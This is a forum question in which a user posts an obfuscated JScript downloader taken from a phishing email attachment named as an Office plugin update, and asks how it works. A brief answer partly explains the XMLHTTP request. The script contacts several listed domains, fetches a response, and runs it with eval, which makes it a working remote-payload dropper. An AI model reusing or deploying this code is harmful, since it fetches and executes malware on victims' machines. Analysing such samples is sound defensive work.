# Likely malicous Javascript-interested in how it works

Tags: malware, javascript

Got this interesting bit of code compressed in an email named *"Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js"* that is undoubtedly malicous, but was curious what it does and am not much of a Javascript coder.

```
function abatae(beeraa) {beeraa.send();}
function greezno() {return 'COUNQWTER'.replace(/QW/g,"");}
function hust(rasp){eval(rasp);}
var x = ["gunbobinaj.com","www.apbfoundation.com","blog.enertres.com","kimyaalemi.com","alto-krvavica.hr"];
var mink = 0;
var mumik = new Array('GE'+'T');
var mustafa = x.length;
while(true)
{
    if(mink>=mustafa)
    {
        break;
    }
    try
    {       
        var lumin = new ActiveXObject("MSXML2.XMLHTTP");
        var zemk = '00000012Qi9ag1Lxi5WL5GYeqMUKg4dxY3wxqiSvY5p7zea6RhRlNYyPH5MZDQTqCM-SWpbTQcFystPcok-Ndq9EPbeFOaoUCWQf9OpN1waFD0-V9ZIty6Lgyw_hRmV0Cj0dW7c1yX1IRnw0';
        var ghyt = false;
        var gerlk = x[mink];        
        lumin.open(mumik[2-2], "http://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
        abatae(lumin);
        var gt = lumin.responseText;
        var miffka = gt.indexOf(zemk);
        var pista = gt.length;
        var miluoki = "a";
        if ((pista+0) > (8+1+1) * 100 && 2 == 2 && miffka + 2 > 1) 
        {
            var kichman = rizma(gt, zemk).join(miluoki+"");
            hust(kichman);
            break;
        }
    }
    catch(e)
    {
    };
    mink++;
};
function malysh() {return "htRESMtp".replace(/RESM/g,"");}
function rizma(kjg, lki) {  return kjg.split(lki);}
```

Answer (score 1):

https://msdn.microsoft.com/en-us/library/ms759148(v=vs.85).aspx

```
The following Microsoft® JScript® example creates an XMLHTTP object and asks a server for an XML document. The server sends back an XML document, which is then displayed in a message box.
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.6.0");  
xmlHttpReq.open("GET", "http://localhost/books.xml", false);  
xmlHttpReq.send();  
WScript.Echo(xmlHttpReq.responseText);
```

As the example shows this sends a request

@ lumin.open () combining x[0]+gerlk+greezno()+zemk

Which will evaluate to http://gumboxxxxx/counter?0000yyyyyyyyyyyyyy

Gets an xml response and parses it